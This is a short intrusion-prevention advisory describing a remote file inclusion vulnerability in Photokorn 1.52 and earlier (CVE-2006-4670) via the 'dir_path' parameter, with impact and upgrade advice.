Intrusion Prevention

Photokorn.File.Inclusion

Description

This indicates a possible attempt to exploit one of several vulnerabilities that have been identified in Photokorn.
These vulnerabilities are due to input validation errors in various scripts (for example "includes/cart.inc.php" and "extras/ext_cats.php") that do not validate the "dir_path" parameter. They could be exploited by remote attackers to include malicious scripts and execute arbitrary commands with the privileges of the web server.

Affected Products

Photokorn version 1.52 and prior.

Impact

System compromise: remote code execution.

Recommended Actions

Upgrade to version 1.6 :
http://www.telekorn.com/cms/front_content.php

CVE References

CVE-2006-4670